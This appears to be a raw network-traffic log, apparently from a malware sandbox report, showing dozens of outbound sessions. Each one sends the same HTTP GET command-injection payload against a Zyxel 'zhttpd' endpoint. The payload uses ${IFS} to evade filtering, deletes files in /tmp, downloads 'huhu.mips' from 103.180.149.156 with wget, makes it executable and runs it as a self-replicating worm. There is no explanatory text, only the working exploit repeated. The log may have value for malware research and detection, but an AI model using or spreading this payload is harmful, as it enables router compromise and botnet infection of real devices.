                                            Feb 2, 2024 06:21:16.704499006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5338192.168.2.1535896170.96.194.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704528093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5339192.168.2.155856624.151.225.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704571962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5340192.168.2.1552320209.173.150.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704613924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5341192.168.2.1544376205.51.250.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704647064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5342192.168.2.1541266105.235.102.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704689980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5343192.168.2.1555342134.192.100.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704716921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5344192.168.2.1539236209.248.47.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704746008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5345192.168.2.1535238206.152.165.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704792976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5346192.168.2.154850236.237.254.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704840899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5347192.168.2.1538780111.176.30.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704880953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5348192.168.2.15495242.176.113.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704931021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5349192.168.2.15404941.58.229.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704971075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5350192.168.2.1540844211.148.87.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704991102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5351192.168.2.1546112117.174.16.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705022097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5352192.168.2.1550466160.112.200.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705039978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5353192.168.2.1538410142.181.146.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705090046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5354192.168.2.153402674.83.102.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705116034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5355192.168.2.153636290.199.179.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705179930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5356192.168.2.155107417.32.40.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705193996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5357192.168.2.1553932165.148.38.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705221891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5358192.168.2.1553408166.198.186.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705285072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5359192.168.2.1539398143.209.79.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705326080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5360192.168.2.1549542123.25.131.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705357075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5361192.168.2.154142458.176.241.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705385923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5362192.168.2.155172034.166.209.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705439091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5363192.168.2.1548904128.15.71.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705487013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5364192.168.2.155627476.28.8.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705517054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5365192.168.2.154934099.93.199.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705552101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5366192.168.2.1557724100.44.225.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705589056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5367192.168.2.154874858.60.178.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705615044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5368192.168.2.155560293.50.170.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705647945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5369192.168.2.154014246.160.244.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705679893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5370192.168.2.1537790177.209.232.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705713987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5371192.168.2.1550926149.166.148.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705771923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5372192.168.2.1546182156.74.53.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705806017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5373192.168.2.1544768139.212.166.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705832005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5374192.168.2.155148042.135.11.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705857038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5375192.168.2.1552150102.151.99.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705895901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5376192.168.2.155749892.226.82.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705945015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5377192.168.2.154357853.30.79.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.705988884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5378192.168.2.15498968.142.156.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706010103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5379192.168.2.154413075.61.96.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706057072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5380192.168.2.154019692.254.244.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706084013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5381192.168.2.1541202165.18.82.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706114054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5382192.168.2.154716649.37.211.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706156969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5383192.168.2.1558758119.52.242.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706222057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5384192.168.2.1555134223.219.88.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706233025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5385192.168.2.154204048.49.97.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706290007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5386192.168.2.154358499.135.55.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706334114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5387192.168.2.154656646.247.91.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706372023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5388192.168.2.1537438113.238.2.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706418991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5389192.168.2.1552884146.175.99.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706454039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5390192.168.2.154478276.47.123.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706484079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5391192.168.2.1534980140.47.176.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706528902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5392192.168.2.1534804156.146.93.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706578016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5393192.168.2.154686476.71.240.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706613064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5394192.168.2.1545574180.76.199.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706638098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5395192.168.2.154302679.9.112.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706675053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5396192.168.2.1553172204.223.250.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706732988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5397192.168.2.1546090198.5.156.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706754923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5398192.168.2.1544092133.156.29.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706794977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5399192.168.2.1558308183.147.233.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706850052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5400192.168.2.1534722116.25.57.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.706881046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5401192.168.2.1542850216.193.101.98443
                                            TimestampBytes transferredDirectionData
